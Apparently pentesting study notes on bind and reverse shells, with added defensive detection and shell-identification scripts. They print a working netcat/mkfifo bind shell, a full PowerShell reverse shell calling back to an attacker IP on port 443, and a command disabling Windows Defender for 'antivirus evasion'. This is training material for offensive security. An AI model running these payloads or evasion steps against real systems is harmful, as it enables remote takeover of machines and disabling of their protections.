Shells & Payloads: Shell Overview

Introduction

  • Shell Definition: Programs providing CLI (Command Line Interface) access to systems

    • Common terminology: "catching" or "popping" a shell = successful remote access

    • Primary goal: Obtain interactive system control for:

      • Privilege escalation

      • System pivoting

      • File transfers

      • Persistence establishment

Shell Types Overview

1. Bind Shells

  • Definition: Listener running on target system awaiting attacker connection

  • Key Characteristics:

    • Requires target to run listener

    • Often blocked by firewalls

    • Best suited for internal network testing

Basic Bind Shell Setup

# On target system (listener):
nc -lvnp 7777

# On attacker system (client):
nc -nv <target-IP> 7777

Interactive Bind Shell Setup

# On target system (openbsd-style nc shown; traditional netcat uses "nc -l -p 7777"):
rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc -l <target-IP> 7777 > /tmp/f

2. Reverse Shells

  • Definition: Target initiates connection to attacker's system

  • Advantages:

    • Better firewall bypass (uses outbound connections)

    • More successful in real-world scenarios

    • Easier to maintain persistence

Basic Reverse Shell Setup

# On attacker system (listener; sudo because 443 is a privileged port):
sudo nc -lvnp 443

# On Windows target (PowerShell):
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('<attacker-IP>',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

Shell Environment Identification

Common Terminal Emulators

  • Windows: Windows Terminal, cmder, PuTTY

  • Linux: xterm, GNOME Terminal, Konsole

  • macOS: Terminal, iTerm2

  • Cross-platform: kitty, Alacritty

Shell Recognition Commands

# View current shell process
ps

# Check shell environment variables
env | grep SHELL

Best Practices & Tips

1. Port Selection

  • Use common ports for better evasion:

    • 443 (HTTPS)

    • 80 (HTTP)

    • Avoid suspicious uncommon ports

2. Antivirus Evasion

# Disable Windows Defender real-time protection (if needed; requires an elevated
# session, and Defender records the change in its Operational log as event 5001)
Set-MpPreference -DisableRealtimeMonitoring $true

3. Firewall Considerations

  • Bind shells:

    • Require incoming connections

    • Often blocked by firewalls

    • Best for internal testing

  • Reverse shells:

    • Use outbound connections

    • Better success rate

    • Preferred for external testing
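From the defender's side, the bind/reverse distinction above also says where to look on a host: a bind shell shows up as an unexpected listening socket, and a reverse shell as an established outbound connection owned by a process that should never hold one (nc, bash, sh). The following is an added example, not from the original notes, that applies those two rules to constructed `ss -tnp` style lines; the set of suspect process names and the sample lines are assumptions, and on a live host the same function reads `ss -tnp | flag_shell_sockets`.

```shell
# Added example (not from the original notes): flag bind-shell listeners and
# reverse-shell connections in `ss -tnp` style output. The sample lines below
# are constructed, and the list of suspect process names is an assumption.

# Read ss -tnp lines on stdin; print one line per suspicious socket.
flag_shell_sockets() {
    awk '
    BEGIN {
        # Processes that normally never own a TCP socket on a server, plus the
        # netcat/socat family that the payloads on this page rely on.
        n = split("nc ncat netcat socat bash sh dash zsh", names, " ")
        for (i = 1; i <= n; i++) suspect[names[i]] = 1
    }
    $1 == "LISTEN" || $1 == "ESTAB" {
        # The owner appears as users:(("name",pid=N,fd=M)) in the last column.
        if (!match($0, /users:\(\("[^"]+"/)) next
        name = substr($0, RSTART + 9, RLENGTH - 10)
        if (!(name in suspect)) next
        pid = "?"
        if (match($0, /pid=[0-9]+/)) pid = substr($0, RSTART + 4, RLENGTH - 4)
        if ($1 == "LISTEN")
            printf "BIND-LISTENER     local=%s process=%s pid=%s\n", $4, name, pid
        else
            printf "REVERSE-CANDIDATE local=%s peer=%s process=%s pid=%s\n", $4, $5, name, pid
    }'
}

# Constructed sample: sshd listening is normal; nc listening on 7777 matches
# the bind shell above; bash holding an established connection to 203.0.113.9:443
# matches a reverse shell; firefox on 443 is ordinary browsing.
SAMPLE_SS_OUTPUT='State  Recv-Q Send-Q Local Address:Port  Peer Address:Port   Process
LISTEN 0      128    0.0.0.0:22          0.0.0.0:*           users:(("sshd",pid=800,fd=3))
LISTEN 0      1      0.0.0.0:7777        0.0.0.0:*           users:(("nc",pid=4242,fd=3))
ESTAB  0      0      10.0.0.5:51234      203.0.113.9:443     users:(("bash",pid=4311,fd=3))
ESTAB  0      0      10.0.0.5:51240      203.0.113.10:443    users:(("firefox",pid=2001,fd=80))'

# Run the rules over the sample (on a live host: ss -tnp | flag_shell_sockets).
scan_sample() {
    printf '%s\n' "$SAMPLE_SS_OUTPUT" | flag_shell_sockets
}

scan_sample
```

The process-name rule is deliberately simple: the point is that the "common port" advice above (443, 80) does nothing about which process owns the socket, so a listener or outbound connection owned by nc or a shell stands out regardless of port.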

4. Shell Stabilization

  • Consider using:

    • Named pipes for persistence

    • Error handling for stability

    • Proper cleanup after session

Payload Types

  • Network data packets

  • Programming instructions

  • Various malware forms

  • Command execution scripts

Security Implications

  • Shells provide direct OS access

  • Enable system command control

  • Facilitate data exfiltration

  • Allow privilege escalation

  • Support lateral movement

Quick Reference

Common Shell Indicators

  • $ prompt = Bash/Ksh/POSIX shell

  • > prompt = Windows CMD

  • PS> prompt = PowerShell
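The Shell Recognition Commands section and the prompt indicators just above both come down to the same question: which shell is actually running? The following is an added example, not from the original notes, that turns both into small POSIX sh functions: one maps a shell path or name (Unix or Windows style) to a family, one classifies a captured prompt string by its trailing character, and one reports the running shell from $SHELL, $0 and ps. The family names and the root-prompt (`#`) case are assumptions of the example.

```shell
# Added example (not from the original notes): identify the running shell
# from three sources and classify a prompt string using the indicators
# listed under Quick Reference. Assumes a POSIX sh with ps(1) available.

# Map a shell path or name (Unix or Windows style) to a shell family.
shell_family() {
    n=${1##*/}            # strip Unix directories
    n=${n##*\\}           # strip Windows directories
    n=${n#-}              # login shells show up as "-bash" in $0
    case "$(printf '%s' "$n" | tr 'A-Z' 'a-z')" in
        bash|sh|dash|ash|ksh|zsh)                echo "posix" ;;
        cmd|cmd.exe)                             echo "cmd" ;;
        pwsh|pwsh.exe|powershell|powershell.exe) echo "powershell" ;;
        *)                                       echo "unknown" ;;
    esac
}

# Classify a captured prompt: "PS ...>" = PowerShell, trailing ">" = CMD,
# trailing "$" = unprivileged POSIX shell, trailing "#" = root POSIX shell.
prompt_family() {
    p=$(printf '%s' "$1" | sed 's/[[:space:]]*$//')
    case "$p" in
        PS*'>')  echo "powershell" ;;
        *'>')    echo "cmd" ;;
        *'$')    echo "posix" ;;
        *'#')    echo "posix-root" ;;
        *)       echo "unknown" ;;
    esac
}

# Report what is actually running: $SHELL is only the login shell from
# /etc/passwd, so in a shell obtained through a payload it can disagree
# with $0 and with the process name that ps reports for this PID.
current_shell_report() {
    printf 'SHELL variable : %s (%s)\n' "${SHELL:-unset}" "$(shell_family "${SHELL:-unknown}")"
    printf '$0             : %s (%s)\n' "$0" "$(shell_family "$0")"
    printf 'process (ps)   : %s\n' "$(ps -p $$ -o comm= 2>/dev/null || echo unavailable)"
}

current_shell_report
```

The three lines of `current_shell_report` are worth comparing rather than reading alone: `echo $SHELL` from the cheatsheet below answers "what is this user's login shell", while `ps -p $$` answers "what process am I typing into", and only the second one changes when a shell is obtained through one of the payloads above.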

Key Commands Cheatsheet

# Basic listener
nc -lvnp <port>

# Basic connection
nc -nv <IP> <port>

# Check current shell
echo $SHELL

# Create named pipe
mkfifo /tmp/f